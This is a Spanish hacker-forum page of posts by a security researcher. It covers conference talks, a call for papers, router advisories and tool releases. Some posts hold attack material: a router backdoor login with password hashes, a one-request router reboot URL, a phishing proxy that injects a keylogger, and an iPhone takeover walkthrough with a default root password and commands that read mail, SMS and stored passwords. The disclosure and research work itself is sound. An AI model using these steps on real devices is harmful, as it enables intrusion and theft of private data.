Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - hkm

#1
[youtube=640,360]http://www.youtube.com/watch?v=pcBf20Z2z5k[/youtube]
Nuevas técnicas de optimización y ofuscación para inyección SQL por Roberto Salgado @LightOS de Websec
En esta plática se demostrarán las técnicas más nuevas y avanzadas de optimización y ofuscación disponibles en el campo de inyecciones de SQL. Estas técnicas sirven para evadir la detección de firewalls y sistemas de prevención de intrusos y extraer información de la base de datos a una velocidad impresionante.
Más información.


[youtube=640,360]http://www.youtube.com/watch?v=BIIhbdZYO34[/youtube]
Seguridad física, mira mamá como Jason Bourne por Alejandro Hernandez @nitr0usmx de IOActive
Al escuchar Seguridad Informática la mayoría piensa solamente en bits y bytes; en exploits y malware; en antivirus e IPS; etc. Sin embargo, existe un rubro sumamente extenso que trata sobre la protección de información, y por información no solamente nos referimos a datos o archivos en computadoras, más bien, también incluimos los servidores físicos que albergan dicha información, los edificios que albergan dicha tecnología y las personas como tal.
Más información.

[youtube=640,360]http://www.youtube.com/watch?v=5b1st7Yg3Bo[/youtube]
Pentesting en la era POST-PC por Jaime Andres Restrepo @DragonJAR de DragonJAR
Los computadores de escritorio y portátiles día a día se ven mas desplazados por los teléfonos inteligentes, las tablets y los dispositivos portables, marcando el comienzo de lo que algunos denominan la era post pc. En esta charla veremos como la seguridad informática se adapta a esta tendencia y como los pentesters podemos utilizar nuevas herramientas de hardware para facilitar nuestro trabajo sin depender exclusivamente de un monitor y un teclado.
Más información.


[youtube=640,360]http://www.youtube.com/watch?v=PCB7fG-ei5g[/youtube]
Protocolos criptográficos para uso futuro (y actual) por Eduardo Ruiz Duarte @toorandom
Un vistazo al futuro de la criptografía en caso de que en este siglo nos toque la primera computadora cuántica personal (Algoritmos que rompen la criptografía actual, y ¿cuáles algoritmos de HOY serán seguros usando hardware con mecánica cuántica?)
Más información.


[youtube=640,360]http://www.youtube.com/watch?v=DSJQUriD6dw[/youtube]
Tráfico de bases de datos en el mercado negro digital por Armando Becerra @Breakpool del IFAI
En esta charla se mostrarán con ejemplos los tres acercamientos al mercado negro digital: la oferta pública, la oferta personalizada y el mercado profundo. Se mostrará que con herramientas sencillas se pueden documentar los dos primeros niveles, incluso para generar evidencia para el proceso judicial. También se tocarán algunas implicaciones legales del tráfico de datos relacionados con la LFPDPPP.
Más información.


[youtube=640,360]http://www.youtube.com/watch?v=kSbiiLV9PkA[/youtube]
SeXSSy secrets: ataques de un javascript ninja por Rubén Ventura @tr3w_
Esta plática pretende difundir información organizada y actualizada desde el punto de vista del atacante para ofrecer una mejor comprensión de por qué es un fallo tan difícil de eliminar, con el objetivo de que la gente gane una mejor conciencia sobre como tener aplicaciones más seguras.
Más información.


[youtube=640,360]http://www.youtube.com/watch?v=qGPM4g51xCw[/youtube]
APT's en profundidad: Disectando y analizando ataques persistentes por Roberto Martinez @r0bertmart1nez de Kaspersky
En los últimos meses ha aparecido en escena un nuevo tipo de amenazas conocidas como APT's o Amenazas Persistentes Avanzadas. La evolución de las amenazas informáticas ha llegado a niveles preocupantes y se han convertido en un riesgo a la seguridad de las Organizaciones. El objetivo de esta charla es mostrar las características de este tipo de amenazas de alto nivel, analizar estrategias de detección, contención y respuesta del incidente de manera adecuada.
Más información.


[youtube=640,360]http://www.youtube.com/watch?v=dP3RaqJubYA[/youtube]
LOG craziness: Sistemas SIEM para humanos! por Victor Gomez @bytevic de ASIMX
Actualmente el mundo de TI sufre de complejidad por el gran número de sistemas y equipos dentro de la red, por ende, las probabilidades de un ataque éxitoso se incrementan exponencialmente, surge la necesidad de crear sistemas que auxilien en el trabajo de prevención de intrusiones así como manejo de incidentes de seguridad.
Más información.


[youtube=640,360]http://www.youtube.com/watch?v=-84qqzwBGzQ[/youtube]
Echidna, sistema de respuesta a incidentes open source por Eduardo Urias @larsx2 de Emerging Threats
El proyecto Echidna es un sistema de respuesta incidentes dirigido a analistas de seguridad siguiendo los principios de Network Security Monitoring. Se trata de un proyecto totalmente Open Source donde comparto crédito con autores de populares herramientas como Ian Firns (Barnyard2, SecurityOnion NSM Scripts) y Edward Bjarte (cxtracker, passivedns, prads, etc.).
Más información.


[youtube=640,360]http://www.youtube.com/watch?v=PWTo0BiVN4E[/youtube]
Vulnerabilidades en tecnologías NFC y RFID por Raul Valencia @security_raul de INFOTEC
Actualmente las nuevas tecnologías se incorporan a nuestra vida cotidiana de manera casí instantanea, pero no estamos concientes de todo lo que implica adoptar una nueva tecnología. La tecnología contactless NFC y RFID que actualmente encontramos en dispositivos móviles, formas de pago y tarjetas de acceso ¿realmente la implementación esta hecha de forma segura? ¿podemos hacer pagos sin que sea "secuestrada" nuestra información?.
Más información.


[youtube=640,360]http://www.youtube.com/watch?v=Qj1fX4IpQcs[/youtube]
Desarrollo de exploit para infraestructura crítica por Raul Valencia @security_raul de INFOTEC
En la actualidad la mayoría de los sistemas en los que dependemos están casi en su totalidad automatizados y muchos otros se encuentran a punto de serlo. En los últimos años se ha demostrado como ciberdelincuentes comprometen esta infraestructura crítica, pasando del malware Stuxnet a el secuestro de drones. La ponencia se enfoca en la importancia de proteger infraestructura sensible y como dichos sistemas pueden ser comprometidos, haciendo énfasis en el descubrimiento y desarrollo de un exploit funcional para infraestructura crítica.
Más información.


[youtube=640,360]http://www.youtube.com/watch?v=v2j0oVKCZLw[/youtube]
Protección web con ESAPI y AppSensor por Manuel López de OWASP Guadalajara
El Proyecto Abierto de Seguridad en Aplicaciones Web (OWASP por sus siglas en inglés) provee algunas soluciones para fortalecer la seguridad en aplicaciones web y mitigar el riesgo de que las dos vulnerabilidades mencionadas con anterioridad sean encontradas y explotadas. En ésta investigación analizaremos sólo dos de estos proyectos: La API de Seguridad Empresarial (ESAPI por sus siglas en inglés) y el AppSensor.
Más información.


[youtube=640,360]http://www.youtube.com/watch?v=7ZlOESRH9l0[/youtube]
Que hacer legalmente si soy victima de ataques informáticos por Carlos Durón
#2
Hacking / Call For Papers GuadalajaraCON 2013!
17 Febrero 2013, 06:41 AM
Por tercera ocasión, tenemos el placer de invitarlos a GuadalajaraCON en su edición 2013. GuadalajaraCON es un evento internacional donde se exponen temas técnicos e innovadores en materia de seguridad informática.

En GuadalajaraCON continuamos brindando pláticas y dinámicas para informar sobre las últimas técnicas y tendencias en la seguridad de la información. Proveemos una comunidad de estudiantes y profesionales con conocimientos especializados. Ofrecemos información concreta sobre amenazas contra la integridad, confidencialidad y disponibilidad de nuestra información.

El Call for Papers estará abierto hasta el 20 de marzo. La dirección a la cual enviar su propuesta de ponencia e información es cfp@guadalajaracon.org.

Pueden participar en este evento enviando ponencias sobre seguridad ofensiva (ej. pentesting, rootkits, explotación), seguridad defensiva (ej. prevención, detección, mitigación), sobre los fines sociales, políticos y económicos que persiguen las actividades maliciosas, y sobre temas legales y éticos que gobiernan nuestra defensa.

Temas sugeridos:

    Pruebas de penetración
    Seguridad web
    Seguridad de bases de datos
    Seguridad de sistemas SCADA
    Seguridad de VoIP, WiFi, IPv6
    Seguridad de dispositivos móviles
    Exploits 0day
    Publicación de vulnerabilidades
    Phreaking
    Criptografía y esteganografía
    Phishing, spam y malware
    Denegación de servicio
    Hardware hacking
    Antivirus, firewalls, IDS/IPS
    Nuevas plataformas (3G, fibra óptica, NFC)
    Ingeniería inversa
    Ingeniería social
    Legislación informática
    Análisis forense
    Administración del riesgo

Se aceptan ponencias de cualquier duración menor a dos horas. Interesados favor de enviar su nombre, nick, descripción de la ponencia y una breve biografía suya a cfp@guadalajaracon.org.

La asistencia al evento es libre y gratuita. El cupo es muy limitado. GuadalajaraCON se llevará a cabo el viernes 19 y sábado 20 de abril del 2013.

Esperamos contar con su participación!


Pedro Joaquín (@_hkm)

hkm@guadalajaracon.org



(Guadalajara, Jalisco, México)
#3
st582

Recientemente mi amigo Hans Von que es también aficionado al hackeo de routers me comentó de una cuenta de administración por defecto en los dispositivos Technicolor TG582n (10.2.0.B). Buscando un poco encontramos que ya se ha hablado de esta cuenta en un comentario de jugca7793 que realizó en youtube.com/all_comments?v=RzEv8Lcf20U hace dos meses.

La cuenta es:
Usuario: superman
Password: superman

[ mlpuser.ini ]
add name=TELMEX password=_CYP2_568a208a7c4180e670d599814b643f8c698908b5799a57a6 role=Administrator hash2=3149ec0a7121b181aa97ea836bda8a85 crypt=sWaoAu6miPuRA defuser=enabled
add name=telmex password=_CYP2_2f06a0e30e68eb96b3563dd2861ab2604e07c9c316b8e160 role=TechnicalSupport hash2=d32acc280ddc4b6c7d2a534813089676 crypt=LUa6VrJGzKlt. defremadmin=enabled
add name=tech password=_CYP2_23260eaf64f1bb0041a955253a67393aa922d9e1993f1346 role=TechnicalSupport hash2=2c836261d72c02cab6d7e9320e1af76e crypt=KSdvrRm6UjiS6
add name=superman password=_CYP2_f05a66f42a0848aaa21cc77c226990d2cd066bc81e0a65ee role=SuperUser hash2=6939edfe6d8030ef2e346945d5771a0f crypt=ITPFBzzBDCF3w


Es posible mitigar esta vulnerablidad cambiando la contraseña de la cuenta y recomiendo deshabilitar la interfaz remota de administración. Para cambiar la contraseña hay que acceder al dispositivo con la cuenta superman y cambiar la contraseña desde el URL: http://192.168.1.254/cgi/b/users/cfg/changepsswdpopup/

st582b height=400

Para eliminar el acceso remoto es necesario descargar el archivo que contiene la configuración desde el URL: http://192.168.1.254/backup.lp?be=0&l0=1&l1=1&tid=BACKUP_RESTORE y editar el archivo eliminando la línea: ifadd name=HTTP group=wan

st582c

Después de esto hay que ingresar nuevamente al mismo URL y subirlo.

FUENTE: http://www.hakim.ws/2013/01/puerta-trasera-en-technicolor-tg582n/
#5
Durante el 20 y 21 de abril se llevó a cabo el GuadalajaraCON 2012 en Guadalajara, Jalisco, México. Fue un evento gratuito y libre. El día de hoy se terminaron de publicar las presentaciones en PDF y software:

Hide and Find Rootkits in Linux (PDF)
En la plática se mostrarán las tecnicas para esconder y encontrar rootkits en los sistemas linux, ya sea mediante SLAB, reconstruccion de la tabla de procesos o mediante el sistema virtual de PROC/SYS. Más información.

Geometría algebraica para criptografía experimental (PDF) (SOFTWARE)
Se explicará una nueva estructura algebraica que cumple los requerimientos necesarios para ser criptográficamente segura en términos de logaritmos discretos en grupos abelianos. Más rápida, de tal manera que los ataques actuales no sean efectivos sobre esta plataforma algebraica. Más información.

Escaneo de puertos distribuido (PDF) (DNMAP)
Como realizar un escaneo de puertos distribuido utilizando servidores en la nube. Se escaneó 15 veces la cantidad de servers disponibles en Shodan en México. Más información.

DotDotPwn 3.0 (PDF)
Herramienta diseñada para automatizar el proceso de búsqueda de vulnerabilidades de Directory Traversal o Escalada de Directorios. Escrita en Perl. Permite auditar servicios de FTP, TFTP, HTTP, o cualquier aplicación web. Más información.

RouterPWN 1.5.146 (PDF) (VIDEOS)
Los últimos avances en cuanto a la herramienta, algunos secretos y una función de detección automatizada de módems. Más información.

Cómo romper RSA generado con OpenSSL (PDF) (SOFTWARE)
Hablaremos de cómo funciona RSA y romperemos una llave al azar en tiempo real generada con OpenSSL, reconstruiremos la llave privada dada la pública y analizaremos la matemática detrás de este problema. Más información.

Criptografía vs Esteganografía (PDF) (SOFTWARE)
Uso de transformadas trigonométricas discretas para optimizar los algoritmos esteganográficos sobre imágenes digitales evitando incremento en datos resultantes y poca pérdida de calidad en imágenes. Más información.

Laboratorio de análisis de malware (PDF)
Como montar un laboratorio de análisis de malware. Incluyendo todo el proceso, desde la captura hasta el análisis. Más información.

Usb Attack Toolkit (UAT) (PDF)
Herramienta para explorar y explotar el protocolo USB llamada UAT (USB Attack Toolkit). La herramienta tiene funciones muy interesantes como un mejor sniffing que Wireshark para tramas grandes y la posibilidad de realizar fuzzing al protocolo USB. Más información.

Detectando intrusiones en la Red (PDF)
Se mostrará un ataque desde Metasploit y se identificarán los patrones que pueden ayudar a identificar el ataque. Adicionalmente se trabajará con una muestra de malware. Más información.

Saludos,


hkm
#6
Les comparto un buen post de LightOS sobre el uso de los nuevos Tamper Scripts de Nmap.

"Los WAFs o Web Application Firewalls se han convertido en la solución de seguridad elegida de varias empresas hoy en día. Algunas empresas incluso, ignoran la verdadera vulnerabilidad y dependen únicamente del firewall para protección. Desaforturnadamente, la mayoría de los firewalls pueden ser evadidos. En este post explico como utilizar las nuevas funciones de SQLMap para evadir WAFs y IDSs"...

  http://websec.mx/blog/ver/Evadiendo_Web_Application_Firewalls_con_SQLMap
#7

El pasado viernes liberé una herramienta para explotar vulnerabilidades en dispositivos embebidos. La herramienta se llama Routerpwn y se puede encontrar en www.routerpwn.com

Es una compilación de exploits locales y remotos en formato listo para correr. Contiene actualmente (v1.0) 83 exploits que se pueden correr de manera local con un solo click a la IP default, o se puede especificar la IP interna o externa (remota) a la cual lanzarle el exploit.

Ha sido programada en javascript y HTML, con el propósito de que pueda correr desde cualquier dispositivo actual. Ha sido optimizada para dispositivos móviles como smartphones y tablets. Se ha probado en televisiones, consolas de video juegos y celulares viejos.

Es un solo archivo .html para poder descargarlo y realizar la explotación de manera local, sin contar con conexión a Internet.

Saludos.


hkm



  Fuente: http://websec.mx/noticias/routerpwn_framework_explotacion_websec
#8
Recientemente publicamos una investigación realizada por LightOS sobre optimización de extracción de datos de blind sql inyection.

El método consiste en obtener la posición del caractér buscado en un arreglo en binario. Asi que la letra d en el arreglo a,b,c,d se transmitiría como 11 en lugar de 1100100 que sería usando el método de bitshifting que era el mejor.

Pueden encontrar la investigación completa en la siguiente liga:

  http://websec.mx/blog/ver/extraer_datos_blind_sql_inyection

Saludos,


hkm
#9

Reunión Underground GuadalajaraCON
Hacker Garage Sábado 2 de Abril 12:00hrs


https://www.underground.org.mx/GuadalajaraCON/



FECHA: Sábado 2 de Abril (este sábado!)
HORA: 12pm a 7pm
LUGAR: Hacker Garage http://hackergarage.mx/
UBICACIÓN:
Justo Sierra #2202, Entre Bernardo de Balbuena y Américas. http://maps.google.com/maps/place?cid=3636487384319501163

PLÁTICAS CONFIRMADAS:

1) Programación orientada al retorno (por tr3w) : Como evadir las últimas defensas de explotación utilizando ROP.

2) Explicación de Mac2wepkey (por hkm) : Explicación del algoritmo para generar la clave inalámbrica de los módems Huawei. Se mostrarán 5 versiones diferentes de la herramienta.

3) Teensy para pentesters y locos (por hkm) : Introducción a la plataforma de desarrollo Teensy y como se puede utilizar para proyectos de seguridad y otros.

4) Intel® Trusted Execution Technology (por Gabriel Labrada y Claudio Acosta): Introducción, Beneficios y Configuración de un Ambiente Computacional Confiable y sus Políticas de Seguridad mediante la Tecnología de Intel® TXT.

Si quieres dar una plática enviame los detalles a mi mail o por MP y con gusto la agendamos. Aún tenemos varios lugares disponibles.


El evento será de entrada libre, pero en apoyo al recien nacido Hacker Garage sugerimos un donativo voluntario de $100 por persona. Consideremos que HG incluye el espacio de libertad, la electricidad, la conexión a Internet, el baño, etc.

Pueden ver fotos del lugar en la página de facebook del Hacker Garage.
La URL del evento en facebook de GuadalajaraCON es: http://www.facebook.com/event.php?eid=100823913334691
Puedes seguir el evento en twitter desde: https://twitter.com/guadalajaracon



El cupo es limitado así que es necesario que se registren enviando un correo a hkm@hakim.ws o por mensaje privado.


hkm
#10
Se ha publicado la investigación sobre el algoritmo para generar la WEP default de los módems Huawei HG520 y HG530 a partir de su MAC.

Aquí se encuentra la información completa: http://www.websec.mx/blog/ver/mac2wepkey_huawei

Y el script: http://www.websec.mx/files/mac2wepkey.py




Saludos,


hkm
#11
En XBOX existen los Gamer Points. Son una especie de retos que te asignan un puntaje a tu cuenta de Xbox Live. Algunos gamers coleccionan estos puntos, incluso hay algunos que juegan todos los juegos solamente por los puntos. Pero existe un inconveniente...

Si estas en casa de un amigo y quieres acumular estos puntos necesitas "Recuperar tu Gamertag" que es descargar tu perfil en la consola de tu amigo. Este es un proceso lento y si no tienes un teclado USB conectado a tu Xbox es aun mas tardado ya que tienes que introducir letra por letra tu email, password y cuenta de Xbox Live.

Utilizando el controlador Teensy 2.0 se puede emular un teclado y ponerle un programa que envie toda la informacion necesaria en el momento adecuado. Este dispositivo es muy peque~o, del tama~o de una memoria USB y se conecta al Xbox por USB.

En la siguiente liga hay un VIDEO que muestra su uso:

http://hakim.ws/teensy/xbox360_gamertag_recovery/

Utilizando el Teensyduino para programarlo como emulador de teclado usb se puede utilizar el siguiente codigo para realizar la recuperacion automatica del gamertag. Unicamente es necesario cambiar GAMERTAG, EMAIL@DDRESS, y PASSWORD:



// XBOX360 Gamertag Recovery using Teensy 2.0
// hkm @ hakim.ws
// http://hakim.ws/teensy/xbox360_gamertag_recovery/
//
// JUST REPLACE FOLLOWING STRINGS:
char gamertag[] = "GAMERTAG";
char email[] = "EMAIL@DDRESS";
char pass[] = "PASSWORD";
// END REPLACE - Done
// Plug before Gamertag field selection


int ledPin = 11;

void setup() {
pinMode(ledPin, OUTPUT);
}

void loop(){
  delay(3000);
  Enter(); //select Gamertag
  delay(3000);
  CommandAtXbox(gamertag); //send Gamertag
  delay(1000);
  Enter(); //select Done
  delay(5000);
  Enter(); //select Continue
  delay(4000);
  CommandAtXbox(email); //send Email address
  delay(1000);
  Enter(); //select Done
  delay(5000);
  CommandAtXbox(pass); //send Password
  Enter(); //select Sign in
  delay(13000);
  Up();
  Enter(); //select Accept
  while (1)
    delay(20000); //END (you should remove it now)
}

void CommandAtXbox(char  *SomeCommand){ //from irongeek
digitalWrite(ledPin, HIGH); // set the LED on
Keyboard.set_modifier(0); //prep release of control keys
Keyboard.set_key1(0); //have to do this to keep it from hitting key multiple times.
Keyboard.send_now(); //Send the key changes
delay(1000);
Keyboard.print(SomeCommand);
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
Keyboard.set_key1(0);
Keyboard.send_now();
digitalWrite(ledPin, LOW); // set the LED off
}

void Enter(){
delay(1000);
digitalWrite(ledPin, HIGH); // set the LED on
Keyboard.set_modifier(0); //prep release of control keys
Keyboard.set_key1(0); //have to do this to keep it from hitting key multiple times.
Keyboard.send_now(); //Send the key changes
delay(500);
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
Keyboard.set_key1(0);
Keyboard.send_now();
digitalWrite(ledPin, LOW); // set the LED off
}

void Up(){
digitalWrite(ledPin, HIGH); // set the LED on
Keyboard.set_modifier(0); //prep release of control keys
Keyboard.set_key1(0); //have to do this to keep it from hitting key multiple times.
Keyboard.send_now(); //Send the key changes
delay(500);
Keyboard.set_key1(KEY_UP);
Keyboard.send_now();
Keyboard.set_key1(0);
Keyboard.send_now();
digitalWrite(ledPin, LOW); // set the LED off
}



Saludos,


hkm
#12

        ==============================================
       HUAWEI ECHOLIFE HG520c Revelacion de Informacion
        ==============================================

Dispositivo:            EchoLife HG520c
Version de Software:    V100R001B021Telmex
                       V100R001B020Telmex
Version de Firmware:    3.10.18.7-1.0.7.0 (ultima version)
                       3.10.18.5-1.0.7.0
Modelos Vulnerables:    HG520c
Fecha de publicacion:   2010-05-16
Criticidad:             Bajo
Impacto:                Revelacion de informacion
Donde:                  En la interfaz de administracion web (LAN/WAN)
Solucion:               No existe solucion disponible en este momento


[Descripcion]
=================
La pagina '/Listadeparametros.html' muestra informacion sensible como la
version del software, la IP interna y el nombre de la red inalambrica.
No se necesita autenticacion para abrir esta pagina.


[Exploit]
=================
Desde la LAN o por algun ataque Client-Side se puede abrir la pagina
'/Listadeparametros.html':

 http://192.168.1.254/Listadeparametros.html

De forma remota, en caso de tener la interfaz web habilitada en la WAN:

 http://<IP REMOTA>/Listadeparametros.html



hkm

hkm@hakim.ws






http://websec.mx/advisories/view/Huawei_HG520c_Revelacion_de_Informacion_via_web
#13
== BeEFYPROXY == hkm @ hakim.ws == http://www.hakim.ws/software/beefyproxy/

BeEFYPROXY es la unión de dos scripts que juntos permiten interceptar y re-enviar contenido modificado de sitios verdaderos aparentando ser el sitio original. Se requiere de apuntar los dominios al IP donde esta hosteado BeEFYPROXY.BeEFYPROXY esta diseñado para correr en un hosting dedicado para que la dirección IP muestre la pagina default de BeEFYPROXY.Se recibe una conexión a la dirección IP y el script toma el valor de la cabecera Host y obtiene la pagina del Host verdadero y agrega el script del cliente BeEF.

== Instalación ==
Descomprime el contenido de beefproxy en /
Apunta cualquier dominio a la IP donde esta hosteado BeEFYPROXY y este se conecta al Host indicado, obtiene la pagina real, le agrega el script de BeEF y muestra el contenido al usuario como si fuera la pagina del dominio verdadero.

== Funciones ==
MITM con modificación de contenido
Redirige el contenido actual del dominio verdadero
Agrega el Framework BeEF (accesible en /beef.php) que incluye:
-Keylog en tiempo real
-Almacena Cookies, Keylog y HTML en /cache (ver por ftp)
-muchas mas funciones (ver http://www.bindshell.net/tools/beef)

== Como esta hecho? ==
Junte BeEF (http://www.bindshell.net/tools/beef) y PHProxy (http://sourceforge.net/projects/poxy) en un solo archivo. Cambie de nombre el index.php de BeEF por beef.php y puse el index.php de PHProxy modificado.En PHProxy cambie la variable $_url_form (ln 1142) que era la barra de navegación del proxy por el url default del script de BeEF:
/hook/beefmagic.js.php y le modifique su label al principio del archivo.Tambien agrege en la ln 417 una función para que cuando se recibe una petición sin variable 'q' por GET, se tome como url default el Host con el que se hace la petición.

== Greets ==
lightos, octalh, sdc, alt3kx, optix, crypkey, xianuro, nitrous, mendozaaaa.

-- BeEFYPROXY por hkm --


DESCARGA Y VIDEO:

http://www.hakim.ws/software/beefyproxy/

http://www.milw0rm.com/video/watch.php?id=99

#14
Existe otra vulnerabilidad en la interfaz de configuracion web de los 2wire
que permite reiniciar los ruteadores con solo hacer una peticion a:
http://gateway.2wire.net/xslt?page=%25

http://192.168.1.254/xslt?page=%25
http://home/xslt?page=%25


Para reiniciar el ruteador da click aqui.

Saludos a los mods!


hkm

mas info: http://www.hakim.ws/2wire/x25dos.html
#15
Premisas:
Iphone con OpenSSH con password default y redes preferentes abiertas.

Fingiremos que somos un access point conocido para conectarnos y usar la cuenta default de OpenSSH.


La mayoria de los iphones liberados por software tienen OpenSSH instalado pues se usa para ejecutar comandos en el telefono y es el metodo mas comun para transferir archivos ademas de que es la base para correr otros programas.

En la ultima version del firmware del iphone (1.1.3) existen varios bugs con OpenSSH:
-no es facil cambiar la contrasena (no se puede usar passwd)
-no aparece el icono de OpenSSH
-algunas veces no se puede desinstalar desde el Installer




1) Usando airodump podemos ver las redes preferentes a las que se conecta.


2) Usando la tecnica de Evil Twin / Access Point Falso podemos hacer que se conecte a nosotros.


3) Con un sniffer o desde la interfaz del router podemos conocer su IP.


4) Nos conectamos con cualquier cliente SSH y ponemos la cuenta default: root:alpine


5) Somos root asi que podemos hacer cualquier cosa (talvez instalar un troyano que reenvie SMS?)
Aqui algunos files interesantes:


Fotos: /private/var/mobile/Media/DCIM/100APPLE

Ver correos: cat /private/var/mobile/Library/Mail/Envelope\ Index

Vet notas: cat /private/var/mobile/Library/Notes/notes.db

Sacar passwords del messenger:  cat /private/var/mobile/Library/Preferences/*MSN.plist

el hosts: /private/var/mobile/Library/Preferences/hosts

SMS: /private/var/mobile/Library/SMS

Contactos: /private/var/mobile/Library/AddressBook


Limitaciones del ataque:
-Necesita tener password por default,
-Redes preferentes abiertas,
-Cuando el telefono esta bloqueado el wifi esta apagado, asi que el script tiene poco tiempo para operar xD

-
[Como cambiar el password default sin usar el comando passwd]

Puedes usar alguno de estos metodos, el primero me funciono bien:

[cypt(3) y vi /etc/master.passwd]
Ve a http://javascript.internet.com/passwords/unix-crypt(3)-encryption.html
Escribe tu password y da click en "Encrypt password" y usa de salt "/s".

Edita /etc/master.passwd con vi para cambiar el password.


[SSH-pass.app]
Run http://winandmac.com/files/SSH-pass.zip y luego cambia el password.




hkm